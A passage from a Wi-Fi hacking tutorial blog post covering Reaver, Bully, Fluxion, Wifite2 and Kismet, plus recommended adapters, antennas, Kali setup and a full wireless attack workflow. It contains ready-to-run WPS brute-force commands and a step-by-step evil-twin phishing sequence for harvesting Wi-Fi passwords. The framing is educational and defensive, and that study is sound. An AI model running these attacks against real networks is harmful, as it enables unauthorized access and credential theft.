sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 1 --lock-delay 30
# -vv → verbose output
# -d 1 → 1 second delay between attempts
# --lock-delay 30 → wait 30 seconds when lockout is detectedMany modern routers implement WPS lockout after several failed attempts, which slows Reaver dramatically. However, many older routers and firmware versions have no lockout mechanism at all.
The single most important takeaway: No matter how strong your WPA2 password is, if WPS is enabled on a router without a robust lockout, Reaver will eventually retrieve that password. WPS must be disabled.
Tool 6: Bully — The Reaver Alternative
Bully performs the same WPS PIN attack as Reaver but is implemented differently in C, making it more reliable against specific router firmware implementations that cause Reaver to stall or produce incorrect results.
sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -v 3Some penetration testers keep both Reaver and Bully available — if one stalls on a particular router model, the other may work more cleanly. The underlying attack and vulnerability are identical.
Tool 7: Fluxion — The Automated Evil Twin Framework
Fluxion automates the full Evil Twin attack workflow into a user-friendly menu-driven interface. It handles everything from initial scanning to password extraction.
FLUXION ATTACK SEQUENCE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PHASE 1: SCAN
→ User selects target SSID/BSSID from scan results
→ Fluxion captures WPA2 handshake from target AP
PHASE 2: EVIL TWIN SETUP
→ Fluxion creates AP with identical SSID
→ Configures hostapd to run the rogue AP
→ Sets up DHCP server for client addresses
→ Configures iptables for traffic routing
PHASE 3: DEAUTHENTICATION
→ Continuous deauth attack against legitimate AP
→ Target clients disconnect, see both APs with same SSID
→ Victims connect to Evil Twin (usually stronger signal)
PHASE 4: CAPTIVE PORTAL
→ All victim traffic redirected to fake router page
→ Page says: "Your router requires a firmware update.
Please re-enter your Wi-Fi password to continue."
→ Social engineering makes this plausible to most users
PHASE 5: PASSWORD VERIFICATION
→ User submits password in captive portal
→ Fluxion runs aircrack-ng against captured handshake
→ If password is correct: SUCCESS. Attacker gets password.
→ If password is wrong: "Incorrect password. Try again."
(Victim tries again, unaware they're being harvested)
PHASE 6: CLEANUP
→ Fluxion stops everything when correct password is found
→ Saves credentials
→ Restores network environment
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━The critical strength of Fluxion over pure offline cracking: it defeats strong passwords. If the WPA2 passphrase is "7x!Kq@M2#nPv$8" — a 14-character random string that would take millions of years to brute-force — Fluxion still retrieves it, because it tricks the user into typing it voluntarily. The attack is against the human, not the cryptography.
This is why user security awareness training is as important as technical hardening.
Tool 8: Wifite2 — The Automated Workflow Manager
Wifite2 is an automated wireless auditing tool. Where individual Aircrack-ng tools require manual orchestration, Wifite handles everything automatically: scanning, target selection, handshake capture, PMKID harvesting, WPS attacks, and cracking.
# Basic automated scan and attack
sudo wifite
# Target only WPS-enabled networks
sudo wifite --wps
# Use specific wordlist for cracking
sudo wifite --dict /usr/share/wordlists/rockyou.txt
# Target specific BSSID
sudo wifite --bssid AA:BB:CC:DD:EE:FFWifite2 is excellent for efficiently running through multiple targets in an authorized engagement. However — and this is important — you should understand every individual tool that Wifite calls before using Wifite. Automated tools fail in unexpected ways, and you cannot troubleshoot them if you do not understand their components. Use Wifite for efficiency once you have mastered the underlying tools.
Tool 9: Kismet — The Wireless Intelligence Platform
Kismet is different from every other tool on this list. It is not an attack tool — it is a comprehensive wireless monitoring, detection, and logging platform.
WHAT KISMET DOES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PASSIVE DETECTION:
→ Discovers all 802.11 networks including hidden SSIDs
→ Logs all access points, clients, and their relationships
→ Tracks device history over time
→ Captures and logs all beacon, probe, and data frames
ATTACK DETECTION:
→ Identifies deauthentication floods
→ Detects rogue access points
→ Flags suspicious management frame patterns
→ Alerts on known attack signatures
MULTI-PROTOCOL:
→ Bluetooth scanning (with compatible hardware)
→ Zigbee detection
→ Z-Wave detection
→ Other RF protocols via software-defined radio
REPORTING:
→ Web-based dashboard (modern Kismet uses a web UI)
→ GPS integration for location-based mapping
→ Long-term logging for forensic analysis
→ Export to JSON, SQL, and other formats
INSTALLATION AND RUN:
sudo apt install kismet
sudo kismet -c wlan0mon
→ Access web UI at http://localhost:2501
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Kismet is used both by defenders (as a WIDS sensor monitoring for attacks) and by attackers during extended reconnaissance operations (silently mapping a target environment's entire wireless landscape over days or weeks). It is the most capable passive wireless monitoring tool available.
Section 3: Hardware — Why Your Laptop Wi-Fi Card Is Useless
This is a section that trips up nearly every beginner. You install Kali Linux, you try to enable monitor mode on your laptop's built-in wireless card, and nothing works. Here is why — and exactly what you need instead.
Why Built-In Laptop Wi-Fi Does Not Work
Your laptop's built-in Wi-Fi adapter is designed and optimized for exactly one thing: connecting your laptop to a wireless network and transferring data efficiently. The manufacturer's driver exposes the minimum functionality required for this purpose.
There are three specific problems:
1. No Monitor Mode Support in Drivers: Even if the chipset is physically capable of receiving arbitrary frames, the Windows, macOS, or Linux driver provided by the manufacturer does not expose this capability. Enabling monitor mode requires a driver that implements the mac80211 Linux wireless subsystem's monitor mode interface. Most built-in adapter drivers do not implement this.
2. No Packet Injection Support: Injecting arbitrary 802.11 frames requires the driver to pass raw frame data directly to the hardware's transmit queue, bypassing the normal connection management logic. Manufacturer drivers do not implement this.
3. Chipset and Firmware Restrictions: Some chips — particularly Intel and Broadcom, which dominate the laptop market — have firmware that actively prevents monitor mode and injection regardless of driver implementation.
BUILT-IN vs EXTERNAL ADAPTER
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Capability │ Built-in Laptop │ Alfa AWUS036NHA
│ (Intel/Broadcom) │ (Atheros AR9271)
────────────────────┼──────────────────┼────────────────────
Connect to network │ ✓ │ ✓
Monitor mode │ ✗ │ ✓
Packet injection │ ✗ │ ✓
Channel locking │ ✗ │ ✓
Capture handshakes │ ✗ │ ✓
Works on 5GHz │ ✓ (2.4+5) │ ✗ (2.4GHz only)
External antenna │ ✗ │ ✓ (RP-SMA)
USB connection │ N/A │ ✓
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━What Chipset to Look For
The wireless security community has thoroughly tested chipsets for monitor mode and injection reliability. The recommended chipsets, in order of community support:
Atheros AR9271: The single most reliable chipset for wireless security work on 2.4GHz. Supported by the ath9k_htc driver, which is built into the Linux kernel. No additional driver installation required on Kali Linux or any modern Ubuntu derivative. Monitor mode and injection work flawlessly out of the box. 2.4GHz only.
Realtek RTL8812AU: The go-to chipset for dual-band (2.4GHz + 5GHz) security work. Requires installation of the Aircrack-ng patched driver (88XXau), but this is straightforward on Kali. Once installed, full monitor mode and injection support on both bands.
Realtek RTL8814AU: Higher-powered version of the RTL8812AU. Four external antenna ports. Excellent for environments with weak signals or significant RF interference. Same driver as RTL8812AU.
MediaTek MT7612U: Good dual-band support on recent (5.x+) Linux kernels. Less community documentation than Realtek or Atheros options, but generally reliable.
Chipsets to avoid:
- Intel (ax200, ax210, and family): No injection support
- Broadcom BCM series: Notoriously poor Linux support, no injection
- Realtek RTL8188 family: Limited injection support, frequently problematic
Recommended Adapters — The Field-Tested List
WIRELESS SECURITY ADAPTER COMPARISON
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Adapter │ Chipset │ Bands │ Max │ Notes
│ │ │ Speed │
─────────────────────┼────────────────┼───────┼────────┼─────────
Alfa AWUS036NHA │ Atheros AR9271 │ 2.4G │ 150M │ Industry
│ │ │ │ standard.
│ │ │ │ Best for
│ │ │ │ WPA2 work
─────────────────────┼────────────────┼───────┼────────┼─────────
Alfa AWUS036ACH │ Realtek │ 2.4G │ 1200M │ Best dual-
│ RTL8812AU │ + 5G │ │ band option
─────────────────────┼────────────────┼───────┼────────┼─────────
Alfa AWUS1900 │ Realtek │ 2.4G │ 1900M │ High power.
│ RTL8814AU │ + 5G │ │ 4 antennas.
─────────────────────┼────────────────┼───────┼────────┼─────────
Panda PAU09 │ Ralink RT5572 │ 2.4G │ 300M │ Budget
│ │ + 5G │ │ option.
─────────────────────┼────────────────┼───────┼────────┼─────────
TP-Link TL-WN722N │ Atheros AR9271 │ 2.4G │ 150M │ Cheap AR9271
(v1 ONLY) │ (v1) │ │ │ option.
│ RTL8188EUS(v2) │ │ │ WARNING: v2+
│ │ │ │ is different
│ │ │ │ chipset!
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
RECOMMENDATION BY USE CASE:
Just starting out / budget conscious → Alfa AWUS036NHA (~$30-40)
Need dual-band (5GHz targets) → Alfa AWUS036ACH (~$40-50)
Professional / Red team use → Alfa AWUS1900 (~$60-80)
Lab backup / secondary adapter → Panda PAU09 (~$20-25)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Important TP-Link TL-WN722N warning: The version 1 of this adapter uses the Atheros AR9271 chipset and is excellent for security work. Versions 2 and 3 use a completely different chipset (Realtek RTL8188EUS) with significantly worse injection support. The hardware looks identical. Check the box carefully — if you can not verify v1, avoid it.
Antennas — Extending Your Reach
The included antennas on most adapters are omnidirectional dipole antennas with 5dBi gain. They are adequate for lab work and most field assessments within normal operating range.
For extended range or targeted reconnaissance:
ANTENNA TYPES FOR WIRELESS SECURITY
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Type │ Gain │ Pattern │ Best For
────────────────┼────────┼──────────────┼─────────────────────
Dipole (stock) │ 5 dBi │ Omnidirection│ Lab, close range
High-gain omni │ 9 dBi │ Omnidirection│ General field work
Yagi │ 14 dBi │ Narrow beam │ Targeting specific
│ │ │ building or floor
Panel │ 10 dBi │ Wide sector │ Building coverage
Parabolic dish │ 24 dBi │ Very narrow │ Long-range attack
│ │ │ (km+ distances)
RANGE REALITY (clear line of sight, Alfa AWUS036NHA):
5 dBi stock dipole: ~100-200m
9 dBi high-gain: ~300-500m
24 dBi parabolic: ~1-5 km
NOTE: All Alfa adapters use RP-SMA connectors. Ensure
any replacement antenna uses RP-SMA (not SMA).
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Setting Up Your Attack Environment
A quick reference for the Kali Linux setup needed to run the tools above:
# Update system
sudo apt update && sudo apt upgrade -y
# Install/update Aircrack-ng suite
sudo apt install aircrack-ng -y
# Install Hashcat
sudo apt install hashcat -y
# Install hcxpcapngtool for capture file conversion
sudo apt install hcxtools -y
# Install Bettercap
sudo apt install bettercap -y
# Install Reaver and Bully
sudo apt install reaver bully -y
# Install Wifite2
sudo apt install wifite -y
# Install Kismet
sudo apt install kismet -y
# For Alfa AWUS036ACH (RTL8812AU) — install driver
sudo apt install realtek-rtl88xxau-dkms -y
# Verify adapter detection
lsusb # should show your adapter
iwconfig # should show wlan0 or similarThe Complete Attacker's View — Putting It Together
Before we move to the live lab simulation in Part III, here is how every concept and tool fits together in a real wireless security assessment workflow:
COMPLETE WIRELESS ATTACK WORKFLOW
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PHASE 1: RECONNAISSANCE (Passive — Zero Footprint)
──────────────────────────────────────────────────
Hardware: Alfa adapter in monitor mode
Tools: airodump-ng / Kismet
Captures: All SSIDs, BSSIDs, channels, encryption types,
client MACs, probe requests, WPS status
→ Identify target SSID and BSSID
→ Note: WPA2? WPA3? Open? WPS enabled?
→ Map all connected clients
PHASE 2: HANDSHAKE / DATA CAPTURE
──────────────────────────────────────────────────
Tools: airodump-ng (targeted capture)
aireplay-ng (deauth to trigger handshake)
Captures: WPA2 four-way handshake
or PMKID (no deauth needed)
→ Lock airodump-ng to target channel and BSSID
→ If client present: send deauth → capture handshake
→ If no client: use hcxdumptool for PMKID harvest
PHASE 3: OFFLINE CRACKING
──────────────────────────────────────────────────
Tools: aircrack-ng (CPU, small wordlists)
hashcat (GPU, large wordlists + rules)
Wordlists: rockyou.txt, custom company lists
→ Dictionary attack with best64.rule
→ Targeted brute force if password pattern is known
PHASE 4: IF WPS ENABLED
──────────────────────────────────────────────────
Tools: Reaver / Bully
→ PIN brute force regardless of password complexity
→ Retrieves WPA passphrase from PIN
PHASE 5: IF SOCIAL ENGINEERING IS IN SCOPE
──────────────────────────────────────────────────
Tools: Fluxion
→ Evil Twin + captive portal
→ Defeats strong passwords by targeting human behavior
PHASE 6: POST-ACCESS EXPLOITATION
──────────────────────────────────────────────────
Tools: Bettercap, nmap, Metasploit
→ ARP spoofing → MitM
→ Traffic interception
→ Internal network scan
→ Pivot to internal servers
(Full coverage in Part III)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Wrapping Up Part II
You now have the complete attacker's toolkit in your head.
You understand not just what each tool does, but why it works — what packets it sends, what it is listening for, and where in the protocol stack each attack operates. You understand the hardware requirements and why they exist. And you understand how all the pieces connect into a coherent workflow from passive reconnaissance to handshake capture to password cracking.
This is the difference between running tools and understanding tools.
In Part III, we take everything from Parts I and II and run it live. Step-by-step lab simulation of a WPA2 network compromise, with detailed explanations of what is happening internally at every step. Then we go further: what does an attacker actually do after they are on the network? ARP spoofing, DNS hijacking, session hijacking, internal scanning, and the path from Wi-Fi access to full corporate compromise. Plus: the movie myths your friends believe versus what actually happens, and how mobile hotspots fit into the threat picture.
If this helped you go from "I run tools" to "I understand tools" — share it. That's the whole point.
That's it for this blog. Go read Part 1 and 2 again and make notes, because it's time for some attacks, All together coming in Part 3 and Part 4.
Comment your doubts, Clap to show some love to our efforts and encourage us. See u
— → Ignore this section…
Tags: Wi-Fi Hacking, Wireless Security, Aircrack-ng, Hashcat, Kali Linux, Ethical Hacking, Penetration Testing, WPA2, WPA3, Network Security, Monitor Mode, Deauthentication Attack, Evil Twin, Cybersecurity, Bug Bounty, Information Security, OSCP